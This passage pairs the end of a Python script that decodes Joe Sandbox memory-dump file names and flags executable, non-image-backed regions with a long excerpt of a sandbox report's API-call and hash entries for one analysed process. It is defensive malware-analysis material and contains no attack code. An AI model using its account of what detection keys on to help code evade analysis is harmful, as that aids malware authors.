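MEM_TYPES = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

# Assumed layout: <proc>.<stage>.<dump_id>.<base>.<protect>.<state>.<type>.<seq>.sdmp
_SDMP_RE = re.compile(
    r"^(?P<proc>[0-9A-Fa-f]{8})\.(?P<stage>[0-9A-Fa-f]{8})\.(?P<dump_id>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\.(?P<state>[0-9A-Fa-f]{8})\."
    r"(?P<mtype>[0-9A-Fa-f]{8})\.(?P<seq>[0-9A-Fa-f]{8})\.sdmp$"
)


@dataclass(frozen=True)
class DumpRegion:
    proc: int
    stage: int
    dump_id: int
    base: int
    protect: int
    state: int
    mtype: int
    seq: int

    @property
    def protection(self) -> str:
        # Low byte selects the access class; 0x100+ bits are modifiers.
        low = self.protect & 0xFF
        name = PAGE_FLAGS.get(low, f"0x{low:02x}")
        mods = [n for bit, n in PAGE_MODIFIERS.items() if self.protect & bit]
        return "|".join([name] + mods)

    @property
    def region_type(self) -> str:
        return MEM_TYPES.get(self.mtype, f"0x{self.mtype:x}")

    @property
    def executable(self) -> bool:
        # All PAGE_EXECUTE* classes occupy the high nibble of the low byte.
        return (self.protect & 0xF0) != 0


def parse_sdmp(name: str) -> DumpRegion:
    m = _SDMP_RE.match(name.strip())
    if not m:
        raise ValueError(f"not a recognised .sdmp name: {name!r}")
    g = m.groupdict()
    return DumpRegion(
        proc=int(g["proc"], 16), stage=int(g["stage"], 16), dump_id=int(g["dump_id"]),
        base=int(g["base"], 16), protect=int(g["protect"], 16), state=int(g["state"], 16),
        mtype=int(g["mtype"], 16), seq=int(g["seq"], 16),
    )


def summarise(names):
    """Return (base, protection, type, suspicious) per region sorted by base.
    A region is flagged when it is executable but not image-backed, the usual
    tell for injected or unpacked code."""
    rows = []
    for n in names:
        r = parse_sdmp(n)
        rows.append((r.base, r.protection, r.region_type,
                     r.executable and r.region_type != "MEM_IMAGE"))
    return sorted(rows)


# Constructed input: the six regions the report lists for process 8.
REPORT_REGIONS = [
    "00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp",
    "00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp",
    "00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp",
    "00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp",
    "00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp",
    "00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp",
]

if __name__ == "__main__":
    for base, prot, mtype, suspicious in summarise(REPORT_REGIONS):
        flag = "<-- executable, not image-backed" if suspicious else ""
        print(f"{base:#010x}  {prot:<22} {mtype:<12} {flag}")
```

Run against the six regions above, every region decodes as MEM_IMAGE with the code region at 0xD61000 marked PAGE_EXECUTE_READ and the region at 0xE2D000 marked PAGE_READWRITE, so nothing is flagged; the flag fires on the dumps of injected processes elsewhere in a report, where execute-enabled MEM_PRIVATE regions appear.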
                                                                                              APIs
                                                                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,00000002,00000001,?,?,?,00D6AE65,?,?,?), ref: 00D68793
                                                                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,?,?,?,00D6AE65,?,?,?), ref: 00D687C9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide
                                                                                              • String ID:
                                                                                              • API String ID: 626452242-0
                                                                                              • Opcode ID: d1375c517d5b73c1900a7d5b744cc3944eebbb0e61576233e5df7436ce69a267
                                                                                              • Instruction ID: 0269f17a9e6b614732277ae90d10033824214b1113d6999a1ec9cf357d134e8e
                                                                                              • Opcode Fuzzy Hash: d1375c517d5b73c1900a7d5b744cc3944eebbb0e61576233e5df7436ce69a267
                                                                                              • Instruction Fuzzy Hash: 7301F2713003047FEB18AB699C4BF7F7AAEDB84350F24413EB102DA2D0EEA0AC009234
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: f95420d91a4988841de692d330e4226365b46530987dd966b867e549c7a55bc9
                                                                                              • Instruction ID: ceeb6110c47a45f3d81feab3cb493e2e243afa45f86a0014d3a772bafe30eec6
                                                                                              • Opcode Fuzzy Hash: f95420d91a4988841de692d330e4226365b46530987dd966b867e549c7a55bc9
                                                                                              • Instruction Fuzzy Hash: 9D519575A00208AFDB10EF68C845FA97BB5EF85364F198168E848DB391C771ED42CBB4
                                                                                              APIs
                                                                                              • CharLowerBuffW.USER32(?,?), ref: 00DCFBE3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: BuffCharLower
                                                                                              • String ID:
                                                                                              • API String ID: 2358735015-0
                                                                                              • Opcode ID: 2a09421f7315a37b3187666ef7bab6302756ad6d54f3bcc12f87bad916ba7bf0
                                                                                              • Instruction ID: 23aa6eec325e8d973a329b984b3d676c652ea05ace24de82ee4bb43127b68b94
                                                                                              • Opcode Fuzzy Hash: 2a09421f7315a37b3187666ef7bab6302756ad6d54f3bcc12f87bad916ba7bf0
                                                                                              • Instruction Fuzzy Hash: B94192B260020AAFCB15EF64C881EEE77B9EF48314B15853EE956D7241EB70DA45CB70
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateProcess
                                                                                              • String ID:
                                                                                              • API String ID: 963392458-0
                                                                                              • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                              • Instruction ID: 35fd70ec958911953cab2f3e9d31c32985aad61031832e1a9fe9855fe27e14b5
                                                                                              • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                              • Instruction Fuzzy Hash: 5431D370A00105DFC798EF58C490A69FBA6FB59300B6886A5E44ACB356D732EDC5CBE0
                                                                                              APIs
                                                                                                • Part of subcall function 00D6557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00D65558,?,?,00DA4B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 00D6559E
                                                                                              • GetPrivateProfileStringW.KERNEL32(?,?,?,?,0000FFFF,?), ref: 00DD8EBE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: FullNamePathPrivateProfileString
                                                                                              • String ID:
                                                                                              • API String ID: 1991638491-0
                                                                                              • Opcode ID: d2dd161b12ceb4b5975f974fed4dd6c0830f652e09de6fb9f2c9d9eafbc7b202
                                                                                              • Instruction ID: bbb43cfab835299f6971f68c82a61dc44e43a91c67ba10f17e7af8957a9c7cfe
                                                                                              • Opcode Fuzzy Hash: d2dd161b12ceb4b5975f974fed4dd6c0830f652e09de6fb9f2c9d9eafbc7b202
                                                                                              • Instruction Fuzzy Hash: F9210E35A00605AFCB11EB64C946CAEBBB5EF49360B044154F946AB362CB31FD85DBB0
                                                                                              APIs
                                                                                                • Part of subcall function 00D66332: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00D6637F,?,?,00D660AA,?,00000001,?,?,00000000), ref: 00D6633E
                                                                                                • Part of subcall function 00D66332: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00D66350
                                                                                                • Part of subcall function 00D66332: FreeLibrary.KERNEL32(00000000,?,?,00D6637F,?,?,00D660AA,?,00000001,?,?,00000000), ref: 00D66362
                                                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,00D660AA,?,00000001,?,?,00000000), ref: 00D6639F
                                                                                                • Part of subcall function 00D662FB: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00DA54C3,?,?,00D660AA,?,00000001,?,?,00000000), ref: 00D66304
                                                                                                • Part of subcall function 00D662FB: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00D66316
                                                                                                • Part of subcall function 00D662FB: FreeLibrary.KERNEL32(00000000,?,?,00DA54C3,?,?,00D660AA,?,00000001,?,?,00000000), ref: 00D66329
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: Library$Load$AddressFreeProc
                                                                                              • String ID:
                                                                                              • API String ID: 2632591731-0
                                                                                              • Opcode ID: 4da2a192d702f2b198ed9d9b0f087462abe09e012008a81f3a99b7885b8912b4
                                                                                              • Instruction ID: 2d83c2f2c04079f5766a0ea41070805a5639d6339ed1bfdd9968cdc6b40356ea
                                                                                              • Opcode Fuzzy Hash: 4da2a192d702f2b198ed9d9b0f087462abe09e012008a81f3a99b7885b8912b4
                                                                                              • Instruction Fuzzy Hash: 1011E731640215ABCF14BB34DC02AAD77A5DF54B11F14842DF483AA2D1EEB5DA499BB0
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: __wsopen_s
                                                                                              • String ID:
                                                                                              • API String ID: 3347428461-0
                                                                                              • Opcode ID: baaba607c463faeb7d0f2fecb9d8c127e3657d64f1f2e6ac20aec91505af7fec
                                                                                              • Instruction ID: 5085f89b34fd6159dc30394e869d73aaeef3911f3799f1fd556a4b6c95096fd8
                                                                                              • Opcode Fuzzy Hash: baaba607c463faeb7d0f2fecb9d8c127e3657d64f1f2e6ac20aec91505af7fec
                                                                                              • Instruction Fuzzy Hash: 6F115A7190420AAFCF05DF98E94099E7BF5EF49310F1040A9F808AB311DA31EE11DBB5
                                                                                              APIs
                                                                                              • ReadFile.KERNELBASE(?,?,00010000,00000000,00000000,?,?,00000000,?,00D66B73,?,00010000,00000000,00000000,00000000,00000000), ref: 00D6B0AC
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileRead
                                                                                              • String ID:
                                                                                              • API String ID: 2738559852-0
                                                                                              • Opcode ID: f5bcb49a3b1c41f7e09bad1e4fafda9c62b32622e2207ec4d77fae80cf5f20ea
                                                                                              • Instruction ID: 6ff3823e2ba9e04bb9b64db7327b6435c999113c43a4028f8bf652147ce538d5
                                                                                              • Opcode Fuzzy Hash: f5bcb49a3b1c41f7e09bad1e4fafda9c62b32622e2207ec4d77fae80cf5f20ea
                                                                                              • Instruction Fuzzy Hash: 85113631200B05DFD7208F15C880B67BBE9EF46364F14C52EE9AA8BA50C772E985CB60
                                                                                              APIs
                                                                                                • Part of subcall function 00D9500D: RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,00D931B9,00000001,00000364,?,?,?,0000000A,00000000), ref: 00D9504E
                                                                                              • _free.LIBCMT ref: 00D953FC
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocateHeap_free
                                                                                              • String ID:
                                                                                              • API String ID: 614378929-0
                                                                                              • Opcode ID: fba82c0aa068c5562b6699b73bb903d727f3ae0d836859c59312de60e55cd848
                                                                                              • Instruction ID: 018c3556ebc384e272b459eebfec7028ee01c8c8f051d55ef4498da39268f53b
                                                                                              • Opcode Fuzzy Hash: fba82c0aa068c5562b6699b73bb903d727f3ae0d836859c59312de60e55cd848
                                                                                              • Instruction Fuzzy Hash: FC014E722047056BEB218F65D845D59FBDCEB85370F25062DE5C4832C0EA70A905C774
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: aea155f1e03846a7945f3ef32b85c3da0dbec0b08e6aeb419bf15716d252f37c
                                                                                              • Instruction ID: 3661ae0e2951595da119662f40ee6a0ce570439b1d020c77678c4e91958c988e
                                                                                              • Opcode Fuzzy Hash: aea155f1e03846a7945f3ef32b85c3da0dbec0b08e6aeb419bf15716d252f37c
                                                                                              • Instruction Fuzzy Hash: 75F0F432500620AACB213B6ADC05B6A3398DF42734F150715F865931D1EFF4D8028FB1
                                                                                              APIs
                                                                                              • RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,00D931B9,00000001,00000364,?,?,?,0000000A,00000000), ref: 00D9504E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocateHeap
                                                                                              • String ID:
                                                                                              • API String ID: 1279760036-0
                                                                                              • Opcode ID: bba4c20edcd3e3e7bb893f70210b4d0a4c3e479c992362dc8865badfde09de0b
                                                                                              • Instruction ID: ffeab4248abac76ea7ba58455eaf05c0332dea733cf2df0564a538905c872db8
                                                                                              • Opcode Fuzzy Hash: bba4c20edcd3e3e7bb893f70210b4d0a4c3e479c992362dc8865badfde09de0b
                                                                                              • Instruction Fuzzy Hash: B9F0B431A01A246ADF322E62FC05B5A3748FB407A1B188135A84DDA198DA34D80187F0
                                                                                              APIs
                                                                                              • RtlAllocateHeap.NTDLL(00000000,?,?,?,00D86A99,?,0000015D,?,?,?,?,00D885D0,000000FF,00000000,?,?), ref: 00D93BE2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocateHeap
                                                                                              • String ID:
                                                                                              • API String ID: 1279760036-0
                                                                                              • Opcode ID: 1803662b74ae908cd2a8fedc528b060b31816637f1f71f025247cd617d4bf720
                                                                                              • Instruction ID: c6e994e2bbcd852bbe52f9e2cdff0f1a1f0c5a7ad3e9926974862460085767e1
                                                                                              • Opcode Fuzzy Hash: 1803662b74ae908cd2a8fedc528b060b31816637f1f71f025247cd617d4bf720
                                                                                              • Instruction Fuzzy Hash: 8DE0653120461557DF31366AEC05F9A3A59DB417A4F194221AC56D61A0DB71DD0083F1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 909623b9b0d456d333bef9aa1b9f5fc568013a7f61c6778e3a2ca59cfa114cf5
                                                                                              • Instruction ID: ed80edccb63d430034c5e9039070b74fb303465f8ff61074e81be8b0f3f289d1
                                                                                              • Opcode Fuzzy Hash: 909623b9b0d456d333bef9aa1b9f5fc568013a7f61c6778e3a2ca59cfa114cf5
                                                                                              • Instruction Fuzzy Hash: A7F0C971505712CFCB349F64E494826BBE5FF1532A3288A7EE1D782624C771E844DF60
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: __fread_nolock
                                                                                              • String ID:
                                                                                              • API String ID: 2638373210-0
                                                                                              • Opcode ID: 246872d857331b2299f9d721c1e21c3e63b90e22c0d4325a9684d784a7ce1dac
                                                                                              • Instruction ID: 11c71ba9ecf8d90e70f826b139e653218a1aea66527277d5289d2df4661f4d34
                                                                                              • Opcode Fuzzy Hash: 246872d857331b2299f9d721c1e21c3e63b90e22c0d4325a9684d784a7ce1dac
                                                                                              • Instruction Fuzzy Hash: 28F0F87140020DFFDF05DF90C941E9E7B79FB05318F208445F9159A152D336DA21EBA1
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 176396367-0
                                                                                              • Opcode ID: cc851593f1fd2b35ed972b3ca0519c9d6ab1506275115f6254acfd33543c89c1
                                                                                              • Instruction ID: 1a0246b4b527ca32a284bd72c4c98af0ea1b425cf58c1cea4c6936c81dc67397
                                                                                              • Opcode Fuzzy Hash: cc851593f1fd2b35ed972b3ca0519c9d6ab1506275115f6254acfd33543c89c1
                                                                                              • Instruction Fuzzy Hash: 97D0C76374255135B669313D6D4BD7F895CCFC26A1B15457FFA06CA1A5ED444C0302F1
                                                                                              APIs
                                                                                              • GetShortPathNameW.KERNELBASE(?,?,00007FFF), ref: 00DCE7A2
                                                                                                • Part of subcall function 00D684B7: _wcslen.LIBCMT ref: 00D684CA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: NamePathShort_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 2021730007-0
                                                                                              • Opcode ID: b7fb28a0618a9bc2d13242e6c79a119927b9be4dc3b3078cf62b23743955ee2a
                                                                                              • Instruction ID: 241143b1261d4132e748761c99c8a82737673fedc8ad0b4c531a7ad2faa173dc
                                                                                              • Opcode Fuzzy Hash: b7fb28a0618a9bc2d13242e6c79a119927b9be4dc3b3078cf62b23743955ee2a
                                                                                              • Instruction Fuzzy Hash: D3E0CD7250022457C71093589C05FEA77EEDFC8790F044170FC05D7248DD64ED80D5B4
                                                                                              APIs
